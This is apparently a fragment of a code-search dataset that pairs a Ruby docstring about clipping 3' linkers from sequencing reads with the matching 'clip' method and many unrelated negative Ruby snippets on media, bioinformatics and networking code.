\"#{lbl_pad_}:a\", \"#{lbl_end1}:a\"\n ) if channel?(:audio)\n\n # TODO the only supported transition, see #*lay\n @filters.concat(\n Filter.blend_v transition_length, channel(:video).resolution, channel(:video).fps, [\"#{lbl_end1}:v\", \"#{lbl || lbl_aux}:v\"], \"#{lbl_reel}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.blend_a transition_length, [\"#{lbl_end1}:a\", \"#{lbl || lbl_aux}:a\"], \"#{lbl_reel}:a\"\n ) if channel?(:audio)\n\n lbl = lbl_reel\n end\n\n end\n\n segments << lbl # NOTE can be nil\n end\n\n segments.compact!\n\n lbl_out = segments[0]\n\n if segments.size > 1\n lbl_out = \"o#{idx}o\"\n\n @filters.concat(\n Filter.concat_v segments.map{|s| \"#{s}:v\"}, \"#{lbl_out}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.concat_a segments.map{|s| \"#{s}:a\"}, \"#{lbl_out}:a\"\n ) if channel?(:audio)\n end\n\n # Overlays\n\n # NOTE in-process overlays first\n\n @overlays.to_a.each_with_index do |over_reel, i|\n next if over_reel.duck # NOTE this is currently a single case of multi-process... process\n\n fail Error, \"Video overlays are not implemented just yet, sorry...\" if over_reel.reel.channel?(:video)\n\n # Audio overlaying\n\n lbl_nxt = \"o#{idx}o#{i}\"\n\n lbl_over = \"o#{idx}l#{i}\"\n @filters.concat( # NOTE audio only, see above\n over_reel.reel.filters_for lbl_over, video: false, audio: channel(:audio)\n )\n @filters.concat(\n Filter.copy \"#{lbl_out}:v\", \"#{lbl_nxt}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.amix_to_first_same_volume [\"#{lbl_out}:a\", \"#{lbl_over}:a\"], \"#{lbl_nxt}:a\"\n ) if channel?(:audio)\n\n lbl_out = lbl_nxt\n end\n\n # NOTE multi-process overlays last\n\n @channel_lbl_ios = {} # XXX this is a spaghetti machine\n @channel_lbl_ios[\"#{lbl_out}:v\"] = io if channel?(:video)\n @channel_lbl_ios[\"#{lbl_out}:a\"] = io if channel?(:audio)\n\n # TODO supporting just \"full\" overlays for now, see exception in #add_reel\n @overlays.to_a.each_with_index do |over_reel, i|\n\n # NOTE this is currently a single case of multi-process... process\n if over_reel.duck\n fail Error, \"Don't know how to duck video... yet\" if over_reel.duck != :audio\n\n Ffmprb.logger.info \"ATTENTION: ducking audio (due to the absence of a simple ffmpeg filter) does not support streaming main input. yet.\"\n\n # So ducking just audio here, ye?\n # XXX check if we're on audio channel\n\n main_av_o = @channel_lbl_ios[\"#{lbl_out}:a\"]\n fail Error, \"Main output does not contain audio to duck\" unless main_av_o\n\n intermediate_extname = Process.intermediate_channel_extname video: main_av_o.channel?(:video), audio: main_av_o.channel?(:audio)\n main_av_inter_i, main_av_inter_o = File.threaded_buffered_fifo(intermediate_extname, reader_open_on_writer_idle_limit: Util::ThreadedIoBuffer.timeout * 2, proc_vis: process)\n @channel_lbl_ios.each do |channel_lbl, io|\n @channel_lbl_ios[channel_lbl] = main_av_inter_i if io == main_av_o # XXX ~~~spaghetti\n end\n process.proc_vis_edge process, main_av_o, :remove\n process.proc_vis_edge process, main_av_inter_i\n Ffmprb.logger.debug \"Re-routed the main audio output (#{main_av_inter_i.path}->...->#{main_av_o.path}) through the process of audio ducking\"\n\n over_a_i, over_a_o = File.threaded_buffered_fifo(Process.intermediate_channel_extname(audio: true, video: false), proc_vis: process)\n lbl_over = \"o#{idx}l#{i}\"\n @filters.concat(\n over_reel.reel.filters_for lbl_over, video: false, audio: channel(:audio)\n )\n @channel_lbl_ios[\"#{lbl_over}:a\"] = over_a_i\n process.proc_vis_edge process, over_a_i\n Ffmprb.logger.debug \"Routed and buffering auxiliary output fifos (#{over_a_i.path}>#{over_a_o.path}) for overlay\"\n\n inter_i, inter_o = File.threaded_buffered_fifo(intermediate_extname, proc_vis: process)\n Ffmprb.logger.debug \"Allocated fifos to buffer media (#{inter_i.path}>#{inter_o.path}) while finding silence\"\n\n ignore_broken_pipes_was = process.ignore_broken_pipes # XXX maybe throw an exception instead?\n process.ignore_broken_pipes = true # NOTE audio ducking process may break the overlay pipe\n\n Util::Thread.new \"audio ducking\" do\n process.proc_vis_edge main_av_inter_o, inter_i # XXX mark it better\n silence = Ffmprb.find_silence(main_av_inter_o, inter_i)\n\n Ffmprb.logger.debug \"Audio ducking with silence: [#{silence.map{|s| \"#{s.start_at}-#{s.end_at}\"}.join ', '}]\"\n\n Process.duck_audio inter_o, over_a_o, silence, main_av_o,\n process_options: {parent: process, ignore_broken_pipes: ignore_broken_pipes_was, timeout: process.timeout},\n video: channel(:video), audio: channel(:audio)\n end\n end\n\n end\n\n @filters\n end",
"def filter_lengths(strings, length=5)\n big_words = []\n strings.each { |ele| big_words << ele if ele.length >= length }\n return big_words\nend",
"def filter_samples(files)\n files.reject { |f| sample?(f) }\n end",
"def readpartial(maxlen=99, buf=\"buffer\") end",
"def ignore_bad_chunking; end",
"def ignore_bad_chunking; end",
"def make_subset(args={}) \n start, stop = args[:start], args[:stop]\n records = args[:records]\n out_folder = args[:out_folder]\n \n # output full records\n File.open(\"#{out_folder}/full.fasta\", 'w') do |handle|\n records.each do |record|\n handle.puts record\n end\n end\n \n # Output truncated records\n nucleotides = 0\n i = 0\n while (nucleotides/sample_size.to_f < (stop - start))\n i += 1\n records.each do |record|\n n = record.sequence[i]\n # normal and ambiguous nucleotides\n if n =~ /[RYSWKMBDHVNGAUTC]/i\n nucleotides += 1\n elsif n =~ /[-\\.]/\n # do nothing about gaps\n else\n fail \"weird character: #{n}\"\n end\n end\n end\n \n File.open(\"#{out_folder}/truncated.fasta\", 'w') do |handle|\n records.each do |record|\n handle.puts \">#{record.name}\\n#{record.sequence[start, start+i]}\"\n end\n end\nend",
"def strict_filters=(_arg0); end",
"def valid_quality?\n quality < MAX_QUALITY && quality > MIN_QUALITY\n end",
"def quality(factor=0.8)\n @quality = factor\n end",
"def recording_length(playbacks)\n # Looping through playbacks array and returning first non-zero length value\n playbacks.each do |playback|\n length = playback[:length]\n return recording_length_string(length) unless length.zero?\n end\n # Return '< 1 min' if length values are zero\n \"< 1 min\"\n end",
"def filter!; end",
"def resampling_required?\n flac_info.streaminfo[\"samplerate\"] != target_sample_rate\n end",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.clipped.fastq')\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n if result_files_exist?(base, '.2.clipped.fastq')\n {\n pair1: '.1.clipped.fastq',\n pair2: '.2.clipped.fastq',\n single: '.1.clipped.single.fastq'\n }\n else\n { single: '.1.clipped.fastq' }\n end\n ).tap do |r|\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n end\n end",
"def limited_samples\n results = positive_samples\n limit = results.map{|x| x[:value]}.max * LIMIT\n results.select{|x| x[:value] > limit}\n end",
"def main \n settings = {}\n settings[\"--minAD\"] = 6 ## min # of reads carrying alternative allele for SNV\n settings[\"--minADIndel\"] = 8 ## min # of reads carrying alternative allele for indel\n settings[\"--minDP\"] = 12 # min depth in parents\n settings[\"--phenotype\"] = \"\"\n settings[\"--minPL\"] = 70\n settings[\"--minPLP\"] = 30\n settings[\"--minPLIndel\"] = 80\n settings[\"--maxAAF\"] = 0.015\n settings[\"--maxFreq\"] = 0.001\n settings[\"--maxAC\"] = 3\n\n optHash = getopt()\n vcf = optHash[\"--vcf\"]\n \n settings[\"--output\"] = vcf \n settings[\"--header\"] = vcf\n settings.keys.sort.each do |s|\n if optHash.key?(s) \n if s == \"--phenotype\" or s == \"--output\" or s == \"--header\"\n settings[s] = optHash[s]\n else\n settings[s] = optHash[s].to_f\n end\n end\n end\n \n\n samples=countSamples(settings[\"--phenotype\"], settings[\"--header\"])\n\n # $stderr.puts samples\n \n filterVCF(vcf,settings,samples) # gt: gene -> pos -> sample -> genotype, \n\nend",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.clipped.fastq')\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n if result_files_exist?(base, '.2.clipped.fastq')\n { pair1: '.1.clipped.fastq', pair2: '.2.clipped.fastq' }\n else\n { single: '.1.clipped.fastq' }\n end\n ).tap do |r|\n # Legacy files\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n r.add_file(:single, \"#{name}.1.clipped.single.fastq\")\n end\n end",
"def lowpass! cutoff_freq, order\n filter = SincFilter.new(:sample_rate => @sample_rate, :order => order, :cutoff_freq => cutoff_freq)\n @data = filter.lowpass(@data)\n return self\n end",
"def collapse!\n run_command(\"mogrify\", \"-quality\", \"100\", \"#{path}[0]\")\n end",
"def ignore_bad_chunking=(_arg0); end",
"def low_note\n return @notes.min_by { |note| note.pitch } \n end",
"def filterFormants(fs)\n fs.delete_if { |f| f[0] < $MIN_F1 || f[0] > $MAX_F1 || f[1] > $MIN_F2 || f[1] < $MAX_F2}\nend",
"def delete_small!\n @contents.delete_if do |c|\n# ((c[1] - c[0]) < @image.min_content_size*0.6) or\n ((c[1] - c[0]) < @image.min_obj_size) or\n ((c[0] - @image.min_obj_size <= 0) and (c[2]<@image.min_content_size)) or\n ((c[1] + @image.min_obj_size >= @projection.size) and (c[2]<@image.min_content_size))\n end\n end",
"def saturation\n filter.cardinality / filter.size.to_f\n end",
"def quality\n return self.sendcmd(\"modem.get_quality\")\n end",
"def trim_buffer\n trim_size = @buffer.size - @max_items\n trim_size = 0 if trim_size < 0\n @buffer.shift(trim_size)\n end",
"def quality(level)\n with_command \"-quality #{level}\"\n end",
"def read_nonblock(maxlen=99, buf=\"buffer\") end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def trim\n return if skip_step?(@names.get('trim'), 'trimming')\n run_cmd(\\\n 'fastx_trimmer -Q33 -f 2' \\\n \" -i #{@names.get('clip')}\" \\\n \" -o #{@names.get('trim')}\"\n )\n end",
"def collapse!(frame = 0)\n mogrify(frame) { |builder| builder.quality(100) }\n end",
"def threshold(text, threshold: false)\n thresh = (word_frequency(text).select { |k, v| v > 4})\n threshold ? thresh.reject {|k,v| k.length < 6} : thresh.reject {|k,v| k.length < 4}\nend",
"def size_range\n CARRIERWAVE_MAX_FILE_SIZE\n end",
"def filter_in(str)\n# init_subneg\n return \"\" if str.nil? || str.empty?\n buf = \"\"\n\n @sc ? @sc.concat(str) : @sc = StringScanner.new(str)\n while b = @sc.get_byte\n\n # OOB sync data\n if @pstack.urgent_on || b.getbyte(0) == DM\n log.debug(\"(#{@pstack.conn.object_id}) Sync mode on\")\n @pstack.urgent_on = false\n @synch = true\n break\n end\n\n case mode?\n when :normal\n case b.getbyte(0)\n when CR\n next if @synch\n set_mode(:cr) if !@pstack.binary_on\n when LF # LF or LF/CR may be issued by broken mud servers and clients\n next if @synch\n set_mode(:lf) if !@pstack.binary_on\n buf << LF.chr\n echo(CR.chr + LF.chr)\n when IAC\n set_mode(:cmd)\n when NUL # ignore NULs in stream when in normal mode\n next if @synch\n if @pstack.binary_on\n buf << b\n echo(b)\n else\n log.debug(\"(#{@pstack.conn.object_id}) unexpected NUL found in stream\")\n end\n when BS, DEL\n next if @synch\n # Leaves BS, DEL in input stream for higher filter to deal with.\n buf << b\n echo(BS.chr)\n else\n next if @synch\n ### NOTE - we will allow 8-bit NVT against RFC 1123 recommendation \"should not\"\n ###\n # Only let 7-bit values through in normal mode\n #if (b[0] & 0x80 == 0) && !@pstack.binary_on\n buf << b\n echo(b)\n #else\n # log.debug(\"(#{@pstack.conn.object_id}) unexpected 8-bit byte found in stream '#{b[0]}'\")\n #end\n end\n when :cr\n # handle CRLF and CRNUL by insertion of LF into buffer\n case b.getbyte(0)\n when LF\n buf << LF.chr\n echo(CR.chr + LF.chr)\n when NUL\n if @server.service_type == :client # Don't xlate CRNUL when client\n buf << CR.chr\n echo(CR.chr)\n else\n buf << LF.chr\n echo(CR.chr + LF.chr)\n end\n else # eat lone CR\n buf << b\n echo(b)\n end\n set_mode(:normal)\n when :lf\n # liberally handle LF, LFCR for clients that aren't telnet correct\n case b.getbyte(0)\n when CR # Handle LFCR by swallowing CR\n else # Handle other stuff that follows - single LF\n buf << b\n echo(b)\n end\n set_mode(:normal)\n when :cmd\n case b.getbyte(0)\n when IAC\n # IAC escapes IAC\n buf << IAC.chr\n set_mode(:normal)\n when AYT\n log.debug(\"(#{@pstack.conn.object_id}) AYT sent - Msg returned\")\n @pstack.conn.sock.send(\"TeensyMUD is here.\\n\",0)\n set_mode(:normal)\n when AO\n log.debug(\"(#{@pstack.conn.object_id}) AO sent - Synch returned\")\n @pstack.conn.sockio.write_flush\n @pstack.conn.sock.send(IAC.chr + DM.chr, 0)\n @pstack.conn.sockio.write_urgent(DM.chr)\n set_mode(:normal)\n when IP\n @pstack.conn.sockio.read_flush\n @pstack.conn.sockio.write_flush\n log.debug(\"(#{@pstack.conn.object_id}) IP sent\")\n set_mode(:normal)\n when GA, NOP, BRK # not implemented or ignored\n log.debug(\"(#{@pstack.conn.object_id}) GA, NOP or BRK sent\")\n set_mode(:normal)\n when DM\n log.debug(\"(#{@pstack.conn.object_id}) Synch mode off\")\n @synch = false\n set_mode(:normal)\n when EC\n next if @synch\n log.debug(\"(#{@pstack.conn.object_id}) EC sent\")\n if buf.size > 1\n buf.slice!(-1)\n elsif @pstack.conn.inbuffer.size > 0\n @pstack.conn.inbuffer.slice(-1)\n end\n set_mode(:normal)\n when EL\n next if @synch\n log.debug(\"(#{@pstack.conn.object_id}) EL sent\")\n p = buf.rindex(\"\\n\")\n if p\n buf.slice!(p+1..-1)\n else\n buf = \"\"\n p = @pstack.conn.inbuffer.rindex(\"\\n\")\n if p\n @pstack.conn.inbuffer.slice!(p+1..-1)\n end\n end\n set_mode(:normal)\n when DO, DONT, WILL, WONT\n if @sc.eos?\n @sc.unscan\n break\n end\n opt = @sc.get_byte\n case b.getbyte(0)\n when WILL\n replies_him(opt.getbyte(0),true)\n when WONT\n replies_him(opt.getbyte(0),false)\n when DO\n requests_us(opt.getbyte(0),true)\n when DONT\n requests_us(opt.getbyte(0),false)\n end\n # Update interesting things in ProtocolStack after negotiation\n case opt.getbyte(0)\n when ECHO\n @pstack.echo_on = enabled?(ECHO, :us)\n when BINARY\n @pstack.binary_on = enabled?(BINARY, :us)\n when ZMP\n @pstack.zmp_on = enabled?(ZMP, :us)\n end\n set_mode(:normal)\n when SB\n @sc.unscan\n break if @sc.check_until(/#{IAC.chr}#{SE.chr}/).nil?\n @sc.get_byte\n opt = @sc.get_byte\n data = @sc.scan_until(/#{IAC.chr}#{SE.chr}/).chop.chop\n parse_subneg(opt.getbyte(0),data)\n set_mode(:normal)\n else\n log.debug(\"(#{@pstack.conn.object_id}) Unknown Telnet command - #{b.getbyte(0)}\")\n set_mode(:normal)\n end\n end\n end # while b\n\n @sc = nil if @sc.eos?\n buf\n end",
"def long_question (quest_arr)\n quest_arr.select { |question| question.size > 15 }\nend",
"def filter_generator; end",
"def print_streams(streams)\n vals = steams.map{|s| s.read}\n while true\n min = vals.min\n i = vals.index(min)\n p min\n vals[i] = streams[i].read\n end\nend",
"def smoothing; end",
"def filterPhixReadsCmd(bamFile)\n jarName = @javaDir + \"/PhixFilterFromBAM.jar\"\n cmd = \"time java \" + @heapSize + \" -jar \" + jarName + \" I=\" + bamFile\n return cmd\n end",
"def fit_to(len, fade_frames=250)\n meant_to_be = len\n self.dps.pop(dps.count- meant_to_be) if meant_to_be < dps.count\n while meant_to_be > dps.count # too short\n self.dps.push 0\n end\n # stop the annoying popping\n if dps.count > fade_frames\n fade_frames.times do |i|\n dps[dps.count-1-i] *= i.to_f / fade_frames\n end\n end\n self\nend",
"def read_blocked\n end",
"def prune_samples(at)\n cutoff = at - @interval\n while @samples.size > 1 && (@samples.first.first < cutoff)\n @samples.shift\n end\n end",
"def constrained_bitrate\n @bitrate * 1.1\n end",
"def _process_queue\n [@queue.length, @max_minifiers - @working_minifiers.length].min.times {\n _spawn_minifier\n }\n end",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.debug \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif ((seq.seq_qual.size>0) && (@params.get_param('use_qual').to_s=='true'))\n \n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\"\n \n min_quality=@params.get_param('min_quality').to_i\n min_length_inside_seq=@params.get_param('min_length_inside_seq').to_i\n max_consecutive_good_bases=@params.get_param('max_consecutive_good_bases').to_i\n \n type='ActionLowQuality'\n actions=[]\n \n regions=get_low_qual_regions(seq.seq_qual,min_quality,min_length_inside_seq,max_consecutive_good_bases)\n \n regions.each do |r|\n low_qual_size=r.last-r.first+1\n \n # puts \"(#{low_qual_size}) = [#{r.first},#{r.last}]: #{a[r.first..r.last].map{|e| (\"%2d\" % e.to_s)}.join(' ')}\"\n \n \n add_stats('low_qual',low_qual_size)\n \n \n # create action\n a = seq.new_action(r.first,r.last,type) # adds the correspondent action to the sequence\n actions.push a\n \n \n \n end\n\n # add quals\n seq.add_actions(actions)\n end \n\n end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def compress\n return :input_too_short if buf.size < 2\n return :input_too_large if buf.size > 0xFFFFFF\n\n outstream = ArrayOStream.new\n .u8(0x11).u16(buf.size).u8(buf.size >> 16)\n\n outbuffer = [8 * 4 + 1] * 33\n outbuffer[0] = 0\n bufferlength = 1\n bufferedBlocks = 0\n readBytes = 0\n while readBytes < buf.size\n if bufferedBlocks == 8\n outstream.write(outbuffer[0, bufferlength])\n outbuffer[0] = 0\n bufferlength = 1\n bufferedBlocks = 0\n end\n\n oldLength = [readBytes, 0x1000].min\n disp, length = occurrence_length(readBytes,\n [buf.size - readBytes, 0x10110].min, readBytes - oldLength, oldLength)\n if length < 3\n outbuffer[bufferlength] = buf[readBytes]\n readBytes += 1\n bufferlength += 1\n else\n readBytes += length\n outbuffer[0] |= (1 << (7 - bufferedBlocks)) & 0xFF\n case\n when length > 0x110\n outbuffer[bufferlength] = 0x10\n outbuffer[bufferlength] |= ((length - 0x111) >> 12) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) >> 4) & 0xFF\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) << 4) & 0xF0\n when length > 0x10\n outbuffer[bufferlength] = 0x00\n outbuffer[bufferlength] |= ((length - 0x111) >> 4) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = ((length - 0x111) << 4) & 0xF0\n else\n outbuffer[bufferlength] = ((length - 1) << 4) & 0xF0\n end\n outbuffer[bufferlength] |= ((disp - 1) >> 8) & 0x0F\n bufferlength += 1\n outbuffer[bufferlength] = (disp - 1) & 0xFF\n bufferlength += 1\n end\n\n bufferedBlocks += 1\n end\n\n if bufferedBlocks > 0\n outstream.write(outbuffer[0, bufferlength])\n end\n\n outstream.buf\n end",
"def trim_data\n self.angular_resolution = self.angular_resolution.round(3)\n self.magnitude = self.magnitude.round(3)\n end",
"def small\n filter << 'Size:Small'\n self\n end",
"def quality(qual = nil)\n @quality = qual || 1 if @quality.nil?\n @quality\n end",
"def compression_was_achieved\n return compression_ratio() < 1\n end",
"def initialize(infile)\n @minimum_level_positive = -1 * MINIMUM_LEVEL # convert that only once, to save CPU power\n \n @mainloop = GLib::MainLoop.new(GLib::MainContext.default, true);\n\n @pipeline = Gst::Pipeline.new(\"levelmeter\")\n \n @source = Gst::ElementFactory.make(\"filesrc\")\n @source.location = infile \n\n @convertor = Gst::ElementFactory.make(\"audioconvert\")\n\n @level = Gst::ElementFactory.make(\"level\", LEVEL_ELEMENT_NAME)\n @level.interval = INTERVAL\n @level.message = true\n\n @sink = Gst::ElementFactory.make(\"autoaudiosink\")\n\n @decoder = Gst::ElementFactory.make(\"decodebin\")\n @decoder.signal_connect(\"new-decoded-pad\") do | dbin, pad, is_last |\n pad.link @convertor.get_pad(\"sink\")\n @convertor >> @level >> @sink\n end\n\n @pipeline.add @source, @decoder, @convertor, @level, @sink\n @source >> @decoder\n\n @pipeline.bus.add_watch do | bus, message |\n case message.type\n when Gst::Message::Type::ERROR\n $stderr.puts \"Error\"\n @mainloop.quit\n exit 1\n\n when Gst::Message::Type::EOS\n @pipeline.stop\n @mainloop.quit\n exit 0\n\n when Gst::Message::Type::ELEMENT\n if message.source.name == LEVEL_ELEMENT_NAME\n channels = message.structure[\"peak\"].size\n channels.times do |i|\n peak = message.structure[\"peak\"][i] > MINIMUM_LEVEL ? (METER_WIDTH * (message.structure[\"peak\"][i]) / @minimum_level_positive).round + METER_WIDTH : 0\n rms = message.structure[\"rms\"][i] > MINIMUM_LEVEL ? (METER_WIDTH * (message.structure[\"rms\"][i]) / @minimum_level_positive).round + METER_WIDTH : 0\n\n # Temporary array used to draw the bars. Maybe not too efficient but simple\n x = []\n x[0] = \"[\"\n x[METER_WIDTH+2] = \"]\"\n\n (1..METER_WIDTH+1).each{ |j| x[j] = \" \" }\n (1..peak+1).each{ |j| x[j] = \"=\" }\n x[rms+1] = \"#\"\n x[peak+1] = \"|\"\n\n puts \"#{i} #{x.join} peak: #{sprintf(\"%.2f\", message.structure[\"peak\"][i])}dB, RMS: #{sprintf(\"%.2f\", message.structure[\"rms\"][i])}dB\"\n end\n xaxis_left = \" #{sprintf(\"%.2f\", MINIMUM_LEVEL)}dB\"\n xaxis_right = \"0dB\"\n \n puts xaxis_left + \" \" * (METER_WIDTH + 2 - xaxis_left.size) + xaxis_right\n end\n end\n true\n end\n end",
"def min_length\n 0\n end",
"def find_truncated_sequence(uri, sorted_sequences, target_length)\n sorted_sequences.find do |seq|\n (uri.special_format.length - seq.length + SEPARATOR.length) <= target_length\n end\n end",
"def init_filter(elements, fp_rate)\n ln2 = Math.log(2)\n\n # using #ceil instead of #floor may be better, but it's bitcoinj's way\n\n calc_m = (-Math.log(fp_rate) * elements / ln2 / ln2 / 8).floor\n @filter_size = [1, [calc_m, MAX_FILTER_SIZE].min].max\n @filter = \"\\x00\" * @filter_size\n\n calc_k = (@filter_size * 8 * ln2 / elements).floor\n @nfunc = [1, [calc_k, MAX_HASH_FUNCS].min].max\n end",
"def sounds_flatter?(freq1, freq2)\n threshold = freq2 * (1 - FREQUENCY_FUDGE_FACTOR)\n freq1 < threshold\n end",
"def quality\n return PRECISE unless within_range?\n return ULTRA_PRECISE if standard_deviation < 3.0\n return VERY_PRECISE if standard_deviation < 5.0\n PRECISE\n end",
"def main \n settings = {}\n settings[\"--missing\"]=0.8\n settings[\"--mq\"]=20\n settings[\"--zmq\"]=0.4 # ((MQ0 / (1.0 * DP)) > $zmq \n settings[\"--freq\"] = -1 # default no filter\n settings[\"--ac\"] = 0 \n settings[\"--maxfreq\"]=1 # default no filter\n # ab=0.95 # allele balance\n settings[\"--qual\"]=50.0 # min qual\n# settings[\"--clusterWinSize\"]=10 # --clusterWindowSize = 10\n settings[\"--HRun\"]=5 # homopolymer\n settings[\"--qd\"]=5.0 # qual over depth cutoff \n settings[\"--sb\"]=-0.1 # strand bias\n settings[\"--minDP\"]=5 # average DP per sample, need to multiply by nsample\n \n optHash = getopt()\n vcf = optHash[\"--vcf\"]\n \n settings.keys.sort.each do |s|\n if optHash.key?(s)\n settings[s] = optHash[s].to_f\n end\n end\n \n# if optHash.key?(\"--indelMask\")\n# settings[\"--indelMask\"] = optHash[\"--indelMask\"]\n# end\n \n nsample=countSamples(vcf)\n \n filterVCF(vcf,settings,nsample) # gt: gene -> pos -> sample -> genotype, \n\nend",
"def check_queue_size_incoming\n `#{config[:path]} | /bin/egrep -c '^[0-9A-F]+ +'`.to_i - check_queue_size_deferred\n end",
"def filter_lengths(strings, length = 5)\n words = []\n strings.each do |word|\n if word.length >= length\n words << word\n end\n end\n return words\nend"
] |
[
"0.6319621",
"0.59022206",
"0.56703275",
"0.554758",
"0.547377",
"0.5358833",
"0.52611023",
"0.52033067",
"0.5195612",
"0.518653",
"0.5154959",
"0.5139686",
"0.5112837",
"0.50397307",
"0.5037474",
"0.5036198",
"0.5016747",
"0.5008545",
"0.49940056",
"0.49842885",
"0.49832982",
"0.49808958",
"0.49791965",
"0.49628726",
"0.49442822",
"0.4941177",
"0.49001184",
"0.48954746",
"0.48761827",
"0.48705056",
"0.4849247",
"0.48469988",
"0.48469988",
"0.48469988",
"0.48372358",
"0.48231488",
"0.4818123",
"0.48066053",
"0.47907937",
"0.47860777",
"0.4777157",
"0.47711673",
"0.477102",
"0.4765164",
"0.47584304",
"0.47584304",
"0.47398606",
"0.47126696",
"0.47094092",
"0.47015947",
"0.46941352",
"0.46913075",
"0.46897507",
"0.467822",
"0.4677292",
"0.46527174",
"0.46389925",
"0.46387854",
"0.46328375",
"0.46207085",
"0.46155518",
"0.46149307",
"0.46043557",
"0.46036422",
"0.45953137",
"0.45872736",
"0.45831108",
"0.458069",
"0.4574275",
"0.45707664",
"0.45675972",
"0.45674604",
"0.4565954",
"0.45656678",
"0.45614174",
"0.45575246",
"0.45537525",
"0.45528513",
"0.45487657",
"0.45482695",
"0.45466706",
"0.45427373",
"0.45418626",
"0.45407188",
"0.45406848",
"0.45348132",
"0.45327944",
"0.45234114",
"0.45225447",
"0.45193177",
"0.45164937",
"0.45162272",
"0.4495411",
"0.4493942",
"0.44933447",
"0.44912744",
"0.4489503",
"0.44816795",
"0.44795412",
"0.44681495"
] |
0.7177229
|
0
|
Clips linker from 3' linker string to be clipped from 3' software clipping software (fastx, cutadapt) error_rate allowed error rate (only for cutadapt) minlen discard all shorter reads Returns nothing.
|
def clip(linker, software, error_rate, minlen)
return if skip_step?(@names.get('clip'), 'clipping')
clipper_cmd = {
fastx: \
'fastx_clipper' \
' -Q33 -c -n -v' \
" -a #{linker}" \
" -l #{minlen}" \
" #{@names.base}" \
" -i #{@names.get('filter')}" \
" -o #{@names.get('clip')}",
cutadapt: \
'cutadapt' \
" -a #{linker}" \
' --trimmed-only' \
" -e #{error_rate}" \
" -m #{minlen}" \
" -o #{@names.get('clip')}" \
" #{@names.get('filter')}" \
"> #{@names.get('cliplog')}"
}
run_cmd(clipper_cmd[software])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def spelling_penalty\n chars.inject_with_index(0) do |penalty, char, i| \n if i < @options[:target].size\n # add to penalty the differences between ascii values in the two strongs * the multiplier\n penalty + ((@options[:target][i] - char[0]).abs * @options[:spelling_multiplier])\n else\n penalty # evolver string is longer than the target, return penalty unchanged.\n end\n end\n end",
"def fix_unselectable_shortest(terms, prefix, original, subject)\n list = original.list.dup\n shortest = list.min{|one, two| one.length <=> two.length}\n return if shortest.nil?\n list.delete(shortest)\n\n check_pattern = completion_matcher(terms, shortest, nil, subject)\n filter = restricted_pattern(prefix)\n if list.all?{|item| check_pattern =~ item and filter !~ item }\n original.list.replace [shortest]\n end\n end",
"def RelaxNG(string_or_io, options = T.unsafe(nil)); end",
"def RelaxNG(string_or_io, options = T.unsafe(nil)); end",
"def sanitize_refpt2 refpt2\n refpt2.strip.gsub(/0[\\d]{1}\\./, \"\").gsub(\".\", \"\")\n end",
"def remove_dead_ends(minlen)\n segments.each do |s|\n c = connectivity(s)\n rm(s) if s.length < minlen and\n (c[0] == 0 or c[1] == 0) and\n !cut_segment?(s)\n end\n self\n end",
"def orig_chain_length(options = {})\n options = {\n input: si,\n output: client_interfaces[0].so,\n timeout: 1000,\n fail_on_timeout: true\n }.merge(options)\n result = nil\n preserve_scan_register_data do\n options[:input].preserve_drive_data do\n # There may be a quicker way of doing this by inspecting the netlist, but\n # that could be difficult and may need to build a lot of knowledge about the\n # circuit behavior into such an analyzer. So instead for now we will just shift\n # some known data into SI and count how long it takes to come out the other side.\n\n # Something suitably long and random\n data = '1011101101000110110001101100011010101111111100000001010110100101'.to_i(2)\n matched = false\n read_data = 0\n i = 0\n while !matched && i < (options[:timeout] + 64)\n options[:input].drive(data[i])\n shift!\n data_out = options[:output].data\n read_data >>= 1\n read_data |= data_out << 63\n read_data &= 0xFFFF_FFFF_FFFF_FFFF\n if read_data == data\n matched = true\n else\n i += 1\n end\n end\n\n if i == (options[:timeout] + 64)\n if options[:fail_on_timeout]\n fail \"The chain is either not complete, or longer than #{options[:timeout]}\"\n else\n result = nil\n end\n else\n result = i - 62\n end\n end\n end\n result\n end",
"def dangler_situation\n (@i == @len) && !valid_word?(@prefix)\n end",
